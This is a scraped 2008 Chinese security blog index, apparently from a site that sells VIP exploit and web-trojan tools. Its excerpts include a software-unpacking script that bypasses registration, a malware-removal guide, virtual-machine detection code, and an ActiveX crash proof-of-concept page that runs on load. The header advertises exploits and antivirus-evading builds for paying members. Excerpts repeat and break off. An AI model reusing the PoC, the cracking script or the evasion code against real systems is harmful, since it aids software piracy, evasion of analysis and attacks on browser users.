2008-03-31 11:06:43
T4nk 造型室 祝大家新年快乐 身体健康 声明:本站唯一联系方式:xS_Soft#QQ.Com #=@ 免责声明: 非本站原创软件,T4nk 未对其进行严格审计,没办法保证其中不包含无意感染的病毒、编程失误导致的危险代码或故意添加的后门。T4nk 不对因使用本程序造成的任何后果负责。本站VIP用户程序只用于研究学习方法,请勿非法用途,使用本软件造成一切后果自负,本站不对造成的任何后果负责!业务联系代理QQ:6530067 注明:请说明来意(业务))[警告:最近发现网上某些人打着(upx)给的免杀ani,MS07045 MS05047进行行骗 大家注意(看清其动画教程的细节)]提醒广大用户及vip:目前市面上流行网马经查明为MS06046 和Yahoo MSG,PPS网络电视 PPLIVE 暴风影音II 讯雷5 讯雷web ActiveX插件证书 IE0day Real等 提醒大家免受骗!另外MS07-047 及MS07-045 查实为骗人把戏 外面流传都是些垃圾品 如有新的EXP和网马或IE 0day会及时出现在代理QQ公告上 请大家留意 谢谢! 近日有发现利用本站公告和利用本站VIP进行行骗的骗子 请大家注意!本站使用RAR解压默认密码为:upx.com.cn Or t4nk 另外本站所有文章包括程序经部分来源于互联网,只供学习研究,不得非法使用,请参考中国大陆有关法律Should you have any questions please do not hesitate to contact us!
[脚本]EncryptPE V2.2007.12.1 S方式完美脱壳脚本
[ 2008-05-03 07:45:30 | 作者: Admin ]
引用
// 注意:须设置忽略0EEDFADE异常
//运行结束以后alt+l查看记录显示oep和rva信息
//如果是dll文件请自行先载入dll入od以后下硬件断点7120964C,再次载入dll再运行脚本
//脚本自动寻找OEP,修复IAT,跳过注册框,修复ReplaceCode,修复EmbeCode,自动保存RVA重定位数据
///////////////////////////////////////////////////////////////////////////////////
// FileName : EncryptPE_2007.12.1.txt
// Comment : EncryptPE V2.2007.12.1 S方式完美脱壳 0.2
// Environment : WinXP SP2,LifeDbg V1.4, OllyScript 1.65.2
//运行结束以后alt+l查看记录显示oep和rva信息
//如果是dll文件请自行先载入dll入od以后下硬件断点7120964C,再次载入dll再运行脚本
//脚本自动寻找OEP,修复IAT,跳过注册框,修复ReplaceCode,修复EmbeCode,自动保存RVA重定位数据
///////////////////////////////////////////////////////////////////////////////////
// FileName : EncryptPE_2007.12.1.txt
// Comment : EncryptPE V2.2007.12.1 S方式完美脱壳 0.2
// Environment : WinXP SP2,LifeDbg V1.4, OllyScript 1.65.2
阅读全文...
[RAT]Espionage Against Pro-Tibet Groups, Others, Spurred Microsoft Patches
[ 2008-05-02 20:07:41 | 作者: Admin ]
引用
SAN FRANCISCO -- Malicious hackers beware: Computer security expert Joel Eriksson might already own your box.
Eriksson, a researcher at the Swedish security firm Bitsec, uses reverse-engineering tools to find remotely exploitable security holes in hacking software. In particular, he targets the client-side applications intruders use to control Trojan horses from afar, finding vulnerabilities
Eriksson, a researcher at the Swedish security firm Bitsec, uses reverse-engineering tools to find remotely exploitable security holes in hacking software. In particular, he targets the client-side applications intruders use to control Trojan horses from afar, finding vulnerabilities
阅读全文...
[PE]Windows PE
[ 2008-05-01 22:05:13 | 作者: Admin ]
引用
Win PE深入研究
Windows PreInstallation Environment(Windows PE)直接从字面上翻译就是“Windows预安装环境”,微软在2002年7月22日发布,它的原文解释是:“Windows预安装环境(Windows PE)是带有限服务的最小Win32子系统,基于以保护模式运行的Windows XP Professional内核。它包括运行Windows安装程序及脚本、连接网络共享、自动化基本过程以及执行硬件验证所需的最小功能。”换句话说,你可把Windows PE看作是一个只拥有最少核心服务的Mini操作系统。微软推出这么一个操作系统当然是因为它拥有与众不同的系统功能,如果要用一句话来解释,我认为与 Win9X/2000/XP相比,Windows PE的主要不同点就是:它可以自定义制作自身的可启动副本,在保证你需要的核心服务的同
Windows PreInstallation Environment(Windows PE)直接从字面上翻译就是“Windows预安装环境”,微软在2002年7月22日发布,它的原文解释是:“Windows预安装环境(Windows PE)是带有限服务的最小Win32子系统,基于以保护模式运行的Windows XP Professional内核。它包括运行Windows安装程序及脚本、连接网络共享、自动化基本过程以及执行硬件验证所需的最小功能。”换句话说,你可把Windows PE看作是一个只拥有最少核心服务的Mini操作系统。微软推出这么一个操作系统当然是因为它拥有与众不同的系统功能,如果要用一句话来解释,我认为与 Win9X/2000/XP相比,Windows PE的主要不同点就是:它可以自定义制作自身的可启动副本,在保证你需要的核心服务的同
阅读全文...
[经典]《We are the world》历史唯一一次的全球著名歌星同台演唱
[ 2008-04-29 22:22:26 | 作者: Admin ]
点击播放/隐藏媒体《We are the world》介绍
出场顺序简单介绍一下:
1985年,迈克尔·杰克逊和莱昂纳尔·里奇共同谱写,由美国45位歌星联合演唱,昆西·琼斯负责制作的,为求援非洲饥民而义卖的唱片《天下一家》(We Are The World),震撼了亿万人的心,风靡全球。
There comes a time when we heed a certain call 我们听到了一声召唤,(Lionel Richie 莱昂纳尔.里奇)
When the world must come together as one 全世界必须团结在一起!(Lionel Richie 莱昂纳尔.里奇& Stevie Wonder史蒂夫.汪德)
...
阅读全文...
[整理]磁碟机新变种手工查杀整理
[ 2008-04-29 21:08:41 | 作者: Admin ]
引用
手动剿灭磁 碟 机完整步骤
准备工作:
1、WSYSCHECK、改扩展名为BAT文件,放桌面备用。
2、破坏DNSQ.DLL的指令保存为k.bat备用:
复制内容到剪贴板
代码:
attrib -r -s -h "%SystemRoot%\System32\dnsq.dll"
ren "%SystemRoot%\system32\dnsq.dll" "dnsq.d11.%random%"
echo MZ > "%SystemRoot%\System32\dnsq.dll"
attrib +s +r +h "%SystemRoot%\System32\dnsq.dll"
3、劫持代码,存为img.reg放桌面备用:
复制内容到剪贴板
代码:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
准备工作:
1、WSYSCHECK、改扩展名为BAT文件,放桌面备用。
2、破坏DNSQ.DLL的指令保存为k.bat备用:
复制内容到剪贴板
代码:
attrib -r -s -h "%SystemRoot%\System32\dnsq.dll"
ren "%SystemRoot%\system32\dnsq.dll" "dnsq.d11.%random%"
echo MZ > "%SystemRoot%\System32\dnsq.dll"
attrib +s +r +h "%SystemRoot%\System32\dnsq.dll"
3、劫持代码,存为img.reg放桌面备用:
复制内容到剪贴板
代码:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
阅读全文...
[Vista] Vista命令大全 (大部分为通用命令)
[ 2008-04-29 20:32:03 | 作者: Admin ]
引用
(下面排列按A-Z)顺序排列
一.win+(X)
其中win不会不知道吧,X为代码!
(1)Win+L 锁定当前用户.
(2)Win+E 资源管理器.
(3)Win+R 运行.
(4)Win+G (Gadgets)顺序切换边栏小工具.
(5)Win+U 轻松访问中心.
(6)Win+X Windows移动中心.
(7)Win+Tab 启用 3D窗口切换.
(8)Ctrl+Win+Tab 用键盘控制 Flip 3D窗口切换其中有个停顿效果.可以有足够的时间进行选择!
(9)Win+break 开启系统属性窗口.
二.Shell:command (外壳命令行)
以“Shell+冒号+命令”的格式,打开各种外壳文件夹:
(1)shell:AddNewProgramsFolder
(2)shell:Administrative Tools
一.win+(X)
其中win不会不知道吧,X为代码!
(1)Win+L 锁定当前用户.
(2)Win+E 资源管理器.
(3)Win+R 运行.
(4)Win+G (Gadgets)顺序切换边栏小工具.
(5)Win+U 轻松访问中心.
(6)Win+X Windows移动中心.
(7)Win+Tab 启用 3D窗口切换.
(8)Ctrl+Win+Tab 用键盘控制 Flip 3D窗口切换其中有个停顿效果.可以有足够的时间进行选择!
(9)Win+break 开启系统属性窗口.
二.Shell:command (外壳命令行)
以“Shell+冒号+命令”的格式,打开各种外壳文件夹:
(1)shell:AddNewProgramsFolder
(2)shell:Administrative Tools
阅读全文...
[vm]Detect Virtual Machine 检测虚拟机
[ 2008-04-26 11:28:56 | 作者: Admin ]
引用
program IsInVM;
{$APPTYPE CONSOLE}
uses
windows;
function InVMware: Boolean;
asm
XOR EAX, EAX
PUSH OFFSET @@Handler
PUSH DWORD PTR FS:[EAX]
MOV DWORD PTR FS:[EAX], ESP
MOV EAX, 564D5868h
MOV EBX, 3c6cf712h
MOV ECX, 0Ah
MOV DX, 5658h
IN EAX, DX
MOV EAX, True
JMP @@NotHandle
@@Handler:
{$APPTYPE CONSOLE}
uses
windows;
function InVMware: Boolean;
asm
XOR EAX, EAX
PUSH OFFSET @@Handler
PUSH DWORD PTR FS:[EAX]
MOV DWORD PTR FS:[EAX], ESP
MOV EAX, 564D5868h
MOV EBX, 3c6cf712h
MOV ECX, 0Ah
MOV DX, 5658h
IN EAX, DX
MOV EAX, True
JMP @@NotHandle
@@Handler:
阅读全文...
[IOCP]DELPHI中完成端口(IOCP)的简单分析
[ 2008-04-24 11:09:20 | 作者: Admin ]
引用
用DELPHI开发网络代码已经有一段时间了!
我发现在网上用VC来实现完成端口(IOCP)的代码很多,但是使用DELPHI来实现的就比较少了。对IOCP讲的清楚的就更少了。在这里我把自己编写DELPHI下的IOCP写出来,希望对刚学完成端口的朋友有个帮助。
首先我们来了解一些在使用IOCP的时候需要使用的一些结构!
(1):单IO数据结构
LPVOID = Pointer;
LPPER_IO_OPERATION_DATA = ^ PER_IO_OPERATION_DATA ;
PER_IO_OPERATION_DATA = packed record
Overlapped: OVERLAPPED;
DataBuf: TWSABUF;
Buffer: array [0..1024] of CHAR;
BytesSEND: DWORD;
我发现在网上用VC来实现完成端口(IOCP)的代码很多,但是使用DELPHI来实现的就比较少了。对IOCP讲的清楚的就更少了。在这里我把自己编写DELPHI下的IOCP写出来,希望对刚学完成端口的朋友有个帮助。
首先我们来了解一些在使用IOCP的时候需要使用的一些结构!
(1):单IO数据结构
LPVOID = Pointer;
LPPER_IO_OPERATION_DATA = ^ PER_IO_OPERATION_DATA ;
PER_IO_OPERATION_DATA = packed record
Overlapped: OVERLAPPED;
DataBuf: TWSABUF;
Buffer: array [0..1024] of CHAR;
BytesSEND: DWORD;
阅读全文...
[Fwall]The truth about personal firewalls|个人防火墙的真相
[ 2008-04-23 23:27:28 | 作者: Admin ]
个人防火墙的真相
翻译:syspro
声明:1、syspro翻译水平有限,有不当之请大家理解。如部分看不懂可以和原文对照。
2、欢迎转载,但请不要漏掉原文作者和翻译者的信息。
3、欢迎大家指出syspro翻译中的错误,syspro好改正。
有多种方式来保护你的计算机免受恶意软件的侵害,比如软件防火墙,病毒和Rootkit检测软件等。所有这些防护软件都基于一些众所周知而几乎没有改进的技术,而且这些技术你也许已经知道,继承这些技术的安全产品也是不完善的。这样的后果通常是可怕的。然而这些安全公司却天真的认为他们的产品是最先进的,包含了最新的特性,是用户必备的。但是只要你透过他们的华丽的外衣就会看到,他们的Bug和错误甚至比你在学校的设计还要多。虽说生产一款产品首要的是好而强有力的广告。但沉重的广告和糟糕的测试结合在一起能向用户展示一些产品所谓的强大吗,能使其产生一种强烈的购买欲望吗?当然不行。
...
阅读全文...
翻译:syspro
声明:1、syspro翻译水平有限,有不当之请大家理解。如部分看不懂可以和原文对照。
2、欢迎转载,但请不要漏掉原文作者和翻译者的信息。
3、欢迎大家指出syspro翻译中的错误,syspro好改正。
有多种方式来保护你的计算机免受恶意软件的侵害,比如软件防火墙,病毒和Rootkit检测软件等。所有这些防护软件都基于一些众所周知而几乎没有改进的技术,而且这些技术你也许已经知道,继承这些技术的安全产品也是不完善的。这样的后果通常是可怕的。然而这些安全公司却天真的认为他们的产品是最先进的,包含了最新的特性,是用户必备的。但是只要你透过他们的华丽的外衣就会看到,他们的Bug和错误甚至比你在学校的设计还要多。虽说生产一款产品首要的是好而强有力的广告。但沉重的广告和糟糕的测试结合在一起能向用户展示一些产品所谓的强大吗,能使其产生一种强烈的购买欲望吗?当然不行。
...
阅读全文...
[poc]Microsoft Works 7 WkImgSrv.dll crash POC
[ 2008-04-23 14:28:08 | 作者: Admin ]
引用
dll版本7.03.0616.0
IE7+xpsp2 测试通过。
转载请注明出处并保持完整性,谢谢。
t4nk www.upx.com.cn
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
IE7+xpsp2 测试通过。
转载请注明出处并保持完整性,谢谢。
t4nk www.upx.com.cn
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
阅读全文...
